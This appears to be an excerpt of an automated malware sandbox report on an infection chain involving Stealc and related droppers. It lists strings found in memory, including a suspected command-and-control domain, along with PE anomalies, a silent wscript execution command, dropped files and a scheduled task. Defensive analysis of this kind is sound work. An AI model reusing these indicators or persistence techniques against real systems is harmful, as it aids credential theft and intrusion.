Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.S3DiLP_FhcLK
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t0.gstatic.com/faviconV2
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://tasks.googleapis.com/
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/6
Source: new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api
Source: new_v8.exe, 00000016.00000003.2526420431.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api#P
Source: new_v8.exe, 00000016.00000003.2853535555.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BED000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api(ws
Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2208207626.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api0
Source: new_v8.exe, 00000016.00000003.2855159283.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api3
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000BC2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/api9
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apiC
Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apie
Source: new_v8.exe, 00000016.00000003.2254203334.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256699750.0000000000BFD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apila
Source: new_v8.exe, 00000016.00000003.2207797471.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2206163710.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apime
Source: new_v8.exe, 00000016.00000003.2783040007.0000000000BF4000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BED000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476112648.0000000000BF3000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/apip
Source: new_v8.exe, 00000016.00000003.2415792676.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou/s
Source: new_v8.exe, 00000016.00000003.2257510373.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256959453.0000000000BD2000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2852199772.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2404258386.0000000000BDE000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2460996534.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2476025408.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2779671424.0000000000BD0000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2342182926.0000000000BD3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227458323.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2256925605.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2227968295.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou:443/api
Source: new_v8.exe, 00000016.00000003.2176713314.0000000000BCB000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2177592016.0000000000BCE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://villagedguy.cyou:443/api4
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_ef0fa27a12d43fbd45649e195429e8a63ddcad7cf7e128c0
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770968702.00002B3C00BA0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearch
Source: chrome.exe, 0000002B.00000002.2771182366.00002B3C00BE4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/search?q=&addon=opensearchn=opensearch
Source: Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: splwow64.exe, 00000013.00000003.2057229298.0000000004B90000.00000004.00000020.00020000.00000000.sdmp, Jurisdiction.pif, 0000001F.00000003.2155575481.00000000042D8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/06
Source: chrome.exe, 0000002B.00000002.2704034525.00002B3C00064000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: chrome.exe, 0000002B.00000002.2771964516.00002B3C00CBC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002FB000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761091858.00002B3C0060C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764212832.00002B3C0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2366929652.00002B3C00448000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C0098B000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2371146012.00002B3C00EC4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760940840.00002B3C005C0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759409029.00002B3C002F0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2764406614.00002B3C00848000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2766763338.00002B3C00970000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/tips/gs
Source: chrome.exe, 0000002B.00000002.2773346174.00002B3C00E24000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/complete/
Source: stealc_default2.exe, 00000011.00000003.1992187439.0000000000DB3000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2178680224.0000000003E2D000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2368715722.00000000057FC000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2405275859.00000000057FA000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2760324094.00002B3C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2770894499.00002B3C00B84000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2761019091.00002B3C005F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2763383332.00002B3C00734000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: chrome.exe, 0000002B.00000002.2768140159.00002B3C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/undo
Source: chrome.exe, 0000002B.00000002.2703874882.00002B3C0000C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000003.2307171567.00002B3C0046C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 0000002B.00000002.2760811390.00002B3C0058C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 0000002B.00000002.2758943906.00002B3C001C4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 0000002B.00000002.2759036713.00002B3C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: stealc_default2.exe, 00000011.00000002.2162755046.0000000000D6B000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2234480460.0000000000BCF000.00000004.00000020.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2541102427.0000000000F4F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/about/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.jXqaKJMO4ZEP
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.NYz0wxyUaYSW
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/RAM:
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/gro.allizom.www.d
Source: 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: stealc_default2.exe, 00000011.00000003.2103880354.000000002D5AA000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2231077746.0000000003F00000.00000004.00000800.00020000.00000000.sdmp, 550b7cfe5f.exe, 0000002A.00000003.2515107023.0000000005ADE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/kZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGp
Source: stealc_default2.exe, 00000011.00000002.2160830623.00000000007CA000.00000004.00000001.01000000.00000009.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/vRm9ybXxwbmxjY21vamNtZW9obHBnZ21mbmJiaWFwa21ibGlvYnwxfDB8MHx
Source: new_v8.exe, 00000016.00000003.2158662833.0000000000BC1000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2149475404.0000000000BBB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.c
Source: new_v8.exe, 00000016.00000003.2149512471.0000000000B71000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159976456.0000000000B7D000.00000004.00000020.00020000.00000000.sdmp, new_v8.exe, 00000016.00000003.2159125127.0000000000B71000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/

System Summary

.NET source code contains very large array initializations

Source: 33.2.f55899dae2.exe.1c770000.2.raw.unpack, searchX64LPVOIDhierarchy.cs	Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832
Source: 33.0.f55899dae2.exe.59408e.1.raw.unpack, searchX64LPVOIDhierarchy.cs	Large array initialization: GetGuidArrayRestrictedSkipVisibilityChecks: array initializer size 440832

Drops large PE files

Source: C:\Users\user\AppData\Local\Temp\1000477001\Offnewhere.exe

File dump: service123.exe.18.dr 314617856

Jump to dropped file

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: axplong.exe.6.dr	Static PE information: section name:
Source: axplong.exe.6.dr	Static PE information: section name: .idata
Source: axplong.exe.6.dr	Static PE information: section name:
Source: random[2].exe.13.dr	Static PE information: section name:
Source: random[2].exe.13.dr	Static PE information: section name: .rsrc
Source: random[2].exe.13.dr	Static PE information: section name: .idata
Source: random[2].exe.13.dr	Static PE information: section name:
Source: c8908bf20d.exe.13.dr	Static PE information: section name:
Source: c8908bf20d.exe.13.dr	Static PE information: section name: .rsrc
Source: c8908bf20d.exe.13.dr	Static PE information: section name: .idata
Source: c8908bf20d.exe.13.dr	Static PE information: section name:
Source: random[1].exe.13.dr	Static PE information: section name:
Source: random[1].exe.13.dr	Static PE information: section name: .idata
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name:
Source: 2dc588f7b5.exe.13.dr	Static PE information: section name: .idata
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8[1].exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: new_v8.exe.13.dr	Static PE information: section name: .vmp+
Source: random[1].exe1.13.dr	Static PE information: section name:
Source: random[1].exe1.13.dr	Static PE information: section name: .rsrc
Source: random[1].exe1.13.dr	Static PE information: section name: .idata
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name:
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: .rsrc
Source: 550b7cfe5f.exe.13.dr	Static PE information: section name: .idata
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name:
Source: 5C4X2NVYNV2E9BIIRWD89LJFJIM.exe.22.dr	Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name:
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name: .idata
Source: AAKAL78BRQNYOCIR09Y.exe.22.dr	Static PE information: section name:

PE file has a writeable .text section

Source: stealc_default2[1].exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: stealc_default2.exe.13.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GreenTech Dynamics\EcoCraft.js"

Source: C:\Users\user\Desktop\file.exe	File created: C:\Windows\Tasks\axplong.job	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\LuggageRepresentations
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\AdditionsSalvation
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\SixCream
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\HomelessLaser
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\ActuallyFtp
Source: C:\Users\user\AppData\Local\Temp\1000817001\splwow64.exe	File created: C:\Windows\EauOfficial
Source: C:\Windows\System32\svchost.exe	File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C5E440	13_2_00C5E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C54CF0	13_2_00C54CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C93068	13_2_00C93068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C87D83	13_2_00C87D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C54AF0	13_2_00C54AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C9765B	13_2_00C9765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C92BD0	13_2_00C92BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C9777B	13_2_00C9777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C96F09	13_2_00C96F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 13_2_00C98720	13_2_00C98720
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C81ECC0	17_2_6C81ECC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C87ECD0	17_2_6C87ECD0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E6C00	17_2_6C8E6C00
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FAC30	17_2_6C8FAC30
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C82AC60	17_2_6C82AC60
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B6D90	17_2_6C8B6D90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C824DB0	17_2_6C824DB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9ACDC0	17_2_6C9ACDC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9A8D20	17_2_6C9A8D20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C94AD50	17_2_6C94AD50
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8EED70	17_2_6C8EED70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8A6E90	17_2_6C8A6E90
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C82AEC0	17_2_6C82AEC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8C0EC0	17_2_6C8C0EC0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C900E20	17_2_6C900E20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8BEE70	17_2_6C8BEE70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C968FB0	17_2_6C968FB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C82EFB0	17_2_6C82EFB0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C820FE0	17_2_6C820FE0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8FEFF0	17_2_6C8FEFF0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C826F10	17_2_6C826F10
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C960F20	17_2_6C960F20
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C88EF40	17_2_6C88EF40
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E2F70	17_2_6C8E2F70
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C9268E0	17_2_6C9268E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C870820	17_2_6C870820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8AA820	17_2_6C8AA820
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8F4840	17_2_6C8F4840
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8B09A0	17_2_6C8B09A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8DA9A0	17_2_6C8DA9A0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8E09B0	17_2_6C8E09B0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C93C9E0	17_2_6C93C9E0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C8549F0	17_2_6C8549F0
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C876900	17_2_6C876900
Source: C:\Users\user\AppData\Local\Temp\1000066001\stealc_default2.exe	Code function: 17_2_6C858960	17_2_6C858960
